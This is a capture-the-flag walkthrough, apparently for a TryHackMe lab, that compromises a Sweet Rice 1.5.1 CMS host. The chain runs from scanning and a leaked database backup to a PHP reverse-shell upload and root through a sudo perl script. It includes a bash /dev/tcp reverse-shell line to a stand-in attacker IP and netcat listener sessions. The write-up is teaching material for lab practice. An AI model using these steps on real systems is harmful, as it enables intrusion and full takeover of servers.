Room Covers:

  • Service Discovery
  • Finding Vulnerabilities
  • Exploitation
  • Privilege Escalation

Target Details

  • IP: 10.10.209.190

Service Discovery

  • Using nmap

    nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190
    
  • Services Discovered

    Service Port Version
    SSH 22 OpenSSH 7.2p2
    HTTP 80 Apache httpd 2.4.18
  • Finding Directories on HTTP server using GoBuster

    gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
    

    Directories Discovered: /content

  • On visiting /content page, the server’s using Basic CMS with Sweet Rice installed

Finding Vulnerabilities

  • From 1st vulnerability, after visting /content/inc/mysql_backup/ link we get SQL database file, from where we get username and password hash, which can be easily cracked online using various tools such as crackstation

    username password hash password
    manager 42f749ade7f9e195bf475f37a44cafcb Passwordxxx

    we don’t know login page yet!

  • Moving to parent directory /content/inc/, we get access to all the files , from where we get Sweet Rice version /content/inc/lastest.txt which is 1.5.1

  • On Searching for Sweet Rice 1.5.1 vulnerabilities on Search Engine, it leads to File Upload

  • On reading the exploit, we get the admin page link as /as but admin page is different which is /content/as

  • Visit /content/as with the admin credentials above

  • We can add custom php code from ADS tab

  • TL;DR;

    Service Vulnerability
    Sweet Rice Backup Disclosure
    Sweet Rice 1.5.1 File Upload
       

Exploitation

  • Create an evil reverse shell adversitement

  • Using PentestMonkey php reverse shell template, we can get access to shell, by chaning ip variable to our attacker’s vpn ip, and then upload

  • Start listener using netcat

    nc -nlvp 1234
    
  • From content/inc/ads/ we can execute the uploaded reverse shell

  • We have access to the shell

    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
    Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
     11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
    USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    
    $ sudo -l
    Matching Defaults entries for www-data on THM-Chal:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User www-data may run the following commands on THM-Chal:
        (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
    
    

    We can run perl and /home/itguy/backup.pl as root

Privilege Escalation

  • Finding Escalation Vectors

    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
    Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
     11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
    USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    
    $ sudo -l
    Matching Defaults entries for www-data on THM-Chal:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User www-data may run the following commands on THM-Chal:
        (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
    
    

    We can run perl and /home/itguy/backup.pl as root

  • Victim’s shell

    # overwrite contents of copy.sh with reverse shell on port
    echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh
    
    # on attacker's machine start netcat listener session on port 4444
    # nc -nlvp 4444
    
    # execute reverse shell with sudo rights
    sudo /usr/bin/perl /home/itguy/backup.pl
    
  • Root Shell on Attacker’s machine

    nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
    bash: cannot set terminal process group (1058): Inappropriate ioctl for device
    bash: no job control in this shell
    [email protected]:/#
    

Get Flags

  • User Flag

    cat /home/itguy/user.txt
    # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}
    
  • Root Flag

    cat /root/root.txt
    # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}